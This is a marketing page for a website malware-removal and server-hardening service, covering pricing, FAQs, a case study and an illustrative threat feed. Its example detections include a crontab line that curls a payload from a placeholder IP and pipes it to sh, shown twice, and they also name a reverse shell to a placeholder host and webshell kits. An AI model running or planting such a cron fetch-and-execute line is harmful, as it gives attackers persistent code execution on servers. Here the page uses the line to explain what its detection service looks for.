Under attack right now? We’ll call you straight back. Hacked?

01932 593642

Threat detection · Malware removal · Hardening

Website malware removal and protection, before the damage spreads.

Malware on your business website? PatientZero finds the first point of infection, removes every trace of it and hardens your site so it can’t come back. One website or a whole server.

Book a demo
  • Unlimited malware removal
  • 24/7 monitoring
  • Rapid response
  • One website from £99/month
  • Unlimited malware removals
  • 24/7 server monitoring
  • Rapid emergency response
  • No long-term contract

For business owners

Malware on your business website? We’ll get it clean, and keep it that way.

You don’t need a server, an IT team or any technical knowledge. If your website has been hacked, or you’re worried it might be, we fix it properly and look after it for you.

Sound familiar?

  • Google says “This site may be hacked”Or Chrome shows a red “Deceptive site ahead” page.
  • Visitors are sent to scam or spam sitesOften only on mobile, or only from Google.
  • Strange pages in Google resultsPharma spam or Japanese text under your domain.
  • Your host has suspended your siteUsually with an email mentioning malware.
  • Your emails are landing in spamYour domain or server IP has been blacklisted.
  • It keeps coming backA plugin “cleaned” it, then it returned.

The problem

Malware doesn’t stay put. It spreads, hides and costs.

Whether you run one business website or a server full of client sites, you’re a target. Automated, AI-assisted tools scan millions of sites a day for an outdated plugin, a nulled theme or a stolen password. Once in, attackers can reach every other site on the same hosting account.

It spreads

One infected plugin gives attackers a foothold on your website, and on every other site, database and mailbox that shares your hosting.

▲ /home/shop/public_html/wp-content/uploads/.cache.php

It hides

Modern malware hides in cron jobs, fake system binaries and database rows, re-infecting the site minutes after a plugin says it’s clean.

*/1 * * * * curl -s hxxp://203.0.113.24/x | sh

It costs

Lost enquiries and sales, Google warnings, lost search rankings, suspended hosting, stolen card data and ICO breach reports. The bill grows every hour it runs.

▲ Google Safe Browsing: "This site may be hacked"

The solution

An immune system for your website.

For one business website or a whole server: a continuous loop that finds infections early, removes them completely and closes the door behind them. Detect. Clean. Protect. Repeat.

  1. 01

    Monitor

    We watch your website and server around the clock: scheduled forensic scans, file-change tracking and uptime alerts.

  2. 02

    Detect

    Our own scan engine hunts for webshells, injected code, rogue admins, cron persistence and backdoors that plugins miss.

  3. 03

    Clean

    Humans verify every finding, remove the malware, keep the evidence and restore anything damaged. As often as it takes.

  4. 04

    Harden

    We close the way in: PHP execution blocked in uploads, SSH and firewall locked down, admins audited, re-infection prevented.

What’s included

Everything it takes to clean a compromise properly.

Not a scan-and-hope plugin. A full incident response service, with the evidence to prove it.

Compromise response

  • Full investigation of hacked WordPress, AWS, GoDaddy and CloudPanel servers
  • Rogue WordPress admins removed
  • Webshells and malicious uploads quarantined (evidence kept)
  • SEO/panel malware and fake "maintenance" pages removed
  • Damaged WordPress core restored
  • Overwritten wp-config and database connections recovered
  • OS-level backdoors cleaned (cron, systemd, fake binaries)
  • Every site verified back online

Protection & hardening

  • PHP execution blocked in uploads
  • Firewall lockdown
  • SSH hardening
  • WordPress admin audit
  • Reinfection-prevention checklist
  • Clean rebuild guidance

Logging & evidence

  • Timestamped log of everything removed and restored
  • Malware evidence vault with file hashes
  • Before/after verification logs

Reporting

  • Plain-English executive summary
  • Full technical findings and timeline
  • Remediation report
  • Clickable HTML report + ZIP package
  • Remaining risks, clearly flagged

Optional add-ons

  • Scan all sites on the same server
  • Recurring malware and admin scans
  • Emergency on-call clean-up
  • Clean server migration
  • Credential rotation support

For agencies

Run client sites on a VPS? We’ll watch the whole server. White-label.

One compromised client site shouldn’t become twenty. We monitor and protect every site on your servers, keep them updated and send reports your clients can read, under your brand.

  • Fully white-label
  • Whole-server monitoring
  • Shareable monthly reports
  • Priority response
Agency plans From £299/month

Built in-house

Not an off-the-shelf scanner. Our own security software.

Designed from real incident response. PatientZero connects to your server over SSH, deploys its scan engine and runs forensic scans and malware sweeps across every site, then hardens what it finds.

Overview

Fleet health at a glance

Every server, connection and running scan, with a “needs attention” queue and one-click Harden and Fix.

Harden

Playbooks, not advice

Shipped playbooks close the doors attackers use most.

Forensic scan · dfir-fast

Find patient zero

Reconstructs the attack timeline: the first way in, every persistence mechanism, every rogue account.

Malware sweep · malware-intelligence

Every site, every file

Signatures and heuristics for webshells, injected JS, SEO spam, redirects, skimmers and miners.

Scans

Every job, every finding, on record

Forensic and malware jobs across your servers, with findings you can open, fix and report on.

Reports

Evidence you can hand over

For clients, insurers and the ICO.

Live threat feed

What our scan engine sees every day.

Illustrative detections from the kind of infections we clean: webshells, cron persistence, rogue admins, reverse shells and SEO spam. Found, quarantined, hardened.

patientzero · live threat feedExample detections
  1. ▲ CRITICALwebshell detected/wp-content/uploads/2026/08/.cache.phpALFA kit
  2. ✓ QUARANTINEDevidence hashedsha256:9f2c…e41avault/0192
  3. ▲ CRITICALcrontab persistence*/1 * * * * curl -s hxxp://203.0.113.24/x | shuser www-data
  4. ✓ REMOVEDcron entry + payload/tmp/.x/kworkerdverified
  5. ▲ HIGHrogue admin accountwp_users: wp_support_admincreated 03:14
  6. ● WARNINGoutdated plugincontact-form-builder 2.1.4update available
  7. ▲ CRITICALreverse shell listenergs-netcat → 198.51.100.7gsocket
  8. ✓ HARDENEDPHP execution disabled/wp-content/uploads/playbook uploads-noexec
  9. ▲ HIGHinjected JS redirectwp-includes/js/jquery/jquery.min.jsoff-domain hop
  10. ✓ RESTOREDWordPress core checksums34 sitesmatch wordpress.org
  11. ▲ CRITICALSEO spam doorway pages/wp-content/themes/twenty/sx/*.html2,047 files
  12. ✓ CLEANmalware sweep completeacme-prod-010 findings

Example detections include a critical webshell in the uploads folder, a crontab entry re-downloading malware every minute, a rogue WordPress admin, a reverse shell listener and SEO spam doorway pages, each followed by quarantine, removal and hardening.

Use cases

Whatever brought you here, there’s a clear next step.

Your business website, looked after properly.

No IT team needed. We clean any malware on your website, clear Google warnings, deal with your hosting company and watch your site 24/7, all for one monthly price per website with every clean-up included.

  • Malware removed and the way in closed
  • Google warnings cleared, host issues sorted
  • One website from £99/month, no contract
Small business protection

Case study

Root compromise, re-infecting every 60 seconds.

An anonymised incident: a Linux server hosting dozens of WordPress sites kept re-infecting minutes after every clean-up.

A plugin said the sites were clean. They weren’t. Our forensic scan found a crontab entry re-downloading the payload every minute, a gsocket reverse shell, a rogue Tailscale VPN node giving the attacker a private way back in, and ALFA and KINGSMAN webshell kits spread across upload folders.

We removed every persistence mechanism, quarantined the shells with hashed evidence, rebuilt damaged WordPress core, rotated credentials and hardened the server. Then we kept watching.

Read the case study
Re-infectionEvery 60 sNone
BackdoorsCron · shell · VPN0
Webshell kitsALFA · KINGSMANQuarantined
Sites onlineIntermittentAll verified
InfectionWebshell via upload
Detectiondfir-fast finds persistence
CleanCron, shell, VPN removed
HardenedMonitored 24/7

Get protected

Tell us what’s happening. Get a plan in two minutes.

A quick security triage. Emergencies go straight to our incident team; everything else gets a tailored protection plan and quote.

Step 1 of 5

What’s happening?

What’s happening?
What are you seeing?What matters most to you?

Tick everything that applies

When did you notice?

Is the site offline?

Payments or customer data?

Choose your priorities

Your stack

Platform

Hosting

Access you can provide SSH access lets our scan engine inspect the whole server: cron jobs, system users and every site. That’s where persistent malware hides, and why it gives the most thorough clean-up.

Number of sites

Servers

Existing security

Quick risk check

Five quick questions. Honest answers get you an honest plan.

  • Recent off-server backup (last 7 days)?

    Without a clean off-server copy, recovery takes longer and evidence can be lost.

  • WordPress core, plugins and themes updated in the last month?

    Outdated plugins are the most common way in.

  • 2FA on admin accounts?

    Stolen or guessed passwords stop working when 2FA is on.

  • Any nulled / pirated plugins or themes?

    No judgement: it is a very common source of infection.

  • Shared hosting with other sites on the same account?

    One infected site can reach every other site on the account.

Your details and next step

Preferred next step

Never send passwords here. We’ll arrange secure access with you.

Pricing

One monthly price. Unlimited clean-ups.

No per-incident fees, no contract. Cancel any time.

Single Site

One website, fully protected and cleaned whenever it needs it.

£99/month

+ one-off £129.99 security audit and setup

Get protected
  • One website
  • Unlimited malware clean-ups
  • 24/7 monitoring and uptime alerts
  • Hardening and reinfection prevention
  • Incident reports

Agency (white-label)

Whole-server protection for your client sites, under your brand.

From£299/month

White-label for your clients

Talk to us
  • Whole-server protection for client sites
  • Fully white-label
  • Shareable client reports
  • Updates across client sites
  • Priority emergency response

Every plan includes unlimited malware removal and no long-term contract. New accounts start with a one-off £129.99 security audit so we know exactly what we’re cleaning before the first removal.

  • No contract
  • Cancel any time
  • Rapid response
  • Fair use applies to full rebuilds

FAQs

Malware removal, answered.

Straight answers. If yours isn’t here, call 01932 593642.

What does unlimited malware removal actually mean?

If any site on your plan gets infected, we clean it, as many times as it takes, at no extra cost. There are no per-incident fees and no clean-up caps. Fair use applies only to full server rebuilds.

My site is infected right now. What should I do?

Call 01932 593642 or use the Under attack? button for an immediate callback. Don't delete files yet, change your hosting and admin passwords from a clean device, and take a backup snapshot so we can trace how the attacker got in.

I only have one business website. Is PatientZero for me?

Yes. PatientZero protects single business websites as well as whole servers. The Single Site plan is £99 a month plus a one-off £129.99 security audit and setup, and includes malware removal whenever it is needed, 24/7 monitoring and help with your hosting company. No technical knowledge needed.

Do you protect one site or every site on my server?

Both. The Single Site plan covers one website. The Server / Multi-site plan covers your whole VPS or shared server with every site on it, which matters because one infected site can reach every other site on the same server.

How much does it cost?

Single Site is £99 a month plus a one-off £129.99 security audit and setup. Server / Multi-site is priced on application after we scope your server. White-label Agency plans start from £299 a month. There is no long-term contract.

How do you stop the malware coming back?

We find and close the way in, not just the symptoms: webshells, cron jobs, rogue admins and backdoors are removed, then we harden the server by blocking PHP in uploads, locking down SSH and the firewall, auditing admins and monitoring 24/7.

Which platforms do you support?

WordPress and WooCommerce first, plus other PHP sites such as Joomla, Drupal and custom PHP. We work on Linux VPS and shared servers including AWS Lightsail, cPanel, CloudPanel, Plesk, GoDaddy and SiteGround.

Is there a contract?

No. Every plan is monthly with no long-term contract, and you can cancel any time. New accounts start with the one-off security audit so we know exactly what we are protecting.

Can agencies white-label PatientZero?

Yes. The Agency plan is fully white-label: whole-server monitoring for your client sites, updates across client sites, shareable client reports under your brand and priority emergency response.

Resources

Guides from the incident desk.

Find patient zero before attackers find the next one.

Get protected with unlimited malware removal, 24/7 monitoring and hardening, or get emergency help right now.

Get protected

or call 01932 593642

Get protected

Incident line

Under attack? We’ll call you straight back.

Leave three details and our incident team is alerted immediately. Or call now on 01932 593642.

Never send passwords here. We’ll arrange secure access with you.